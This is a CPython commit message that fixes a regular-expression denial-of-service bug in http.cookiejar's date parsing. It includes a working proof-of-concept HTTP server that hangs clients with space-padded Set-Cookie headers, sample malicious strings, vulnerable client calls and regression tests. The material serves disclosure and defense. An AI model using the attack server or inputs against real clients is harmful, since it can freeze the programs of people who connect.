python/cpython

bpo-38804: Fix REDoS in http.cookiejar (GH-17157) (GH-17345)

    The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
    expression denial of service (REDoS).
    
    LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
    to parse Set-Cookie headers returned by a server.
    Processing a response from a malicious HTTP server can cause extreme
    CPU usage and block execution for a long time.
    
    The regex contained multiple overlapping \s* capture groups.
    Ignoring the ?-optional capture groups, the regex could be simplified to
    
        \d+-\w+-\d+(\s*\s*\s*)$
    
    Therefore, a long sequence of spaces can trigger bad performance.
    
    Matching a malicious string such as
    
        LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")
    
    caused catastrophic backtracking.
    
    The fix removes ambiguity about which \s* should match a particular
    space.
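
The effect of that ambiguity can be observed with a small timing sketch. It uses the simplified pattern quoted above, not the real LOOSE_HTTP_DATE_RE, and the single-\s* pattern is only an assumed illustration of "one group owns every space", not the actual patched regex. The names AMBIGUOUS, UNAMBIGUOUS and time_match are hypothetical.

```python
import re
import time

# Simplified pattern from the message above: three adjacent \s* groups,
# any of which may claim any given space.
AMBIGUOUS = re.compile(r"\d+-\w+-\d+(\s*\s*\s*)$")

# Assumed illustration of an unambiguous form: one \s* owns every space.
# This is NOT the regex shipped in the fix.
UNAMBIGUOUS = re.compile(r"\d+-\w+-\d+(\s*)$")


def time_match(pattern, n_spaces):
    """Return (match result, elapsed seconds) for a non-matching input."""
    text = "1-c-1" + (" " * n_spaces) + "!"
    start = time.perf_counter()
    result = pattern.match(text)
    return result, time.perf_counter() - start


if __name__ == "__main__":
    # Sizes are kept small on purpose; the ambiguous pattern slows down
    # quickly as the run of spaces grows.
    for n in (50, 100, 200):
        _, slow = time_match(AMBIGUOUS, n)
        _, fast = time_match(UNAMBIGUOUS, n)
        print(f"{n:4d} spaces: ambiguous {slow:.4f}s, unambiguous {fast:.6f}s")
```

Both patterns reject the input and both accept a string that ends in plain trailing spaces; only the time taken to reach the rejection differs.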
    
    You can create a malicious server that responds with Set-Cookie headers
    to attack any Python program that accesses it, e.g.:
    
        from http.server import BaseHTTPRequestHandler, HTTPServer
    
        def make_set_cookie_value(n_spaces):
            spaces = " " * n_spaces
            expiry = f"1-c-1{spaces}!"
            return f"b;Expires={expiry}"
    
        class Handler(BaseHTTPRequestHandler):
            def do_GET(self):
                self.log_request(204)
                self.send_response_only(204)  # Don't bother sending Server and Date
                n_spaces = (
                    int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                    if len(self.path) > 1 else
                    65506  # Max header line length 65536
                )
                value = make_set_cookie_value(n_spaces)
                for i in range(99):  # Not necessary, but we can have up to 100 header lines
                    self.send_header("Set-Cookie", value)
                self.end_headers()
    
        if __name__ == "__main__":
            HTTPServer(("", 44020), Handler).serve_forever()
    
    This server returns 99 Set-Cookie headers, each containing 65506 spaces.
    Extracting the cookies will effectively never complete.
    
    Vulnerable client using the example at the bottom of
    https://docs.python.org/3/library/http.cookiejar.html :
    
        import http.cookiejar, urllib.request
        cj = http.cookiejar.CookieJar()
        opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
        r = opener.open("http://localhost:44020/")
    
    The popular requests library was also vulnerable without any additional
    options (as it uses http.cookiejar by default):
    
        import requests
        requests.get("http://localhost:44020/")
    
    * Regression test for http.cookiejar REDoS
    
    If we regress, this test will take a very long time.
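
A regression test along these lines might look like the sketch below. It is not the test added by this commit. The class and method names are hypothetical, and it assumes that the undocumented helpers http.cookiejar.http2time and http.cookiejar.iso2time are the code paths that apply the two regexes. It also assumes an interpreter that already contains the fix; on an unfixed build the first test would run for a very long time, which is exactly the failure signal described above.

```python
import unittest
from http.cookiejar import http2time, iso2time


class CookieDateRedosTest(unittest.TestCase):
    """Hypothetical regression tests; names are illustrative only."""

    def test_http2time_rejects_padded_garbage(self):
        # Same shape as the malicious Expires value: date-like prefix,
        # a long run of spaces, then a character that prevents a match.
        self.assertIsNone(http2time("1-c-1" + (" " * 2000) + "!"))

    def test_iso2time_rejects_padded_garbage(self):
        self.assertIsNone(iso2time("444444" + (" " * 2000) + "A"))

    def test_valid_date_still_parses(self):
        # The epoch in the strict HTTP date format parses to timestamp 0.
        self.assertEqual(http2time("Thu, 01 Jan 1970 00:00:00 GMT"), 0)
```

Saved to a file, this can be run with `python -m unittest <file>`. There is deliberately no timing assertion: a hung regex cannot be interrupted from within the test, so slowness itself is the indicator.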
    
    * Improve performance of http.cookiejar.ISO_DATE_RE
    
    A string like
    
        "444444" + (" " * 2000) + "A"
    
    could cause poor performance due to the 2 overlapping \s* groups,
    although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
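
A rough counting model suggests why two overlapping groups are less serious than three. It assumes that, because the final anchor fails at every position, a backtracking matcher may end up trying every way for k adjacent \s* groups to consume at most n spaces between them. That count is the binomial coefficient C(n + k, k). The function name is hypothetical and the result is a model of the search space, not a measurement of what Python's regex engine actually does.

```python
from math import comb


def backtracking_attempts(n_spaces, n_groups):
    """Count the ways n_groups adjacent whitespace groups can together
    consume at most n_spaces spaces (stars-and-bars count)."""
    return comb(n_spaces + n_groups, n_groups)


if __name__ == "__main__":
    # Two overlapping groups, as in the ISO_DATE_RE example: quadratic growth.
    print(backtracking_attempts(2000, 2))   # 2003001
    # Three overlapping groups, as in the simplified LOOSE_HTTP_DATE_RE: cubic.
    print(backtracking_attempts(2000, 3))   # 1337337001
```

Under this model, 2000 spaces give about two million candidate splits for two groups but over a billion for three, which is consistent with one case being merely slow and the other being a denial of service.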
    
    (cherry picked from commit 1b779bf)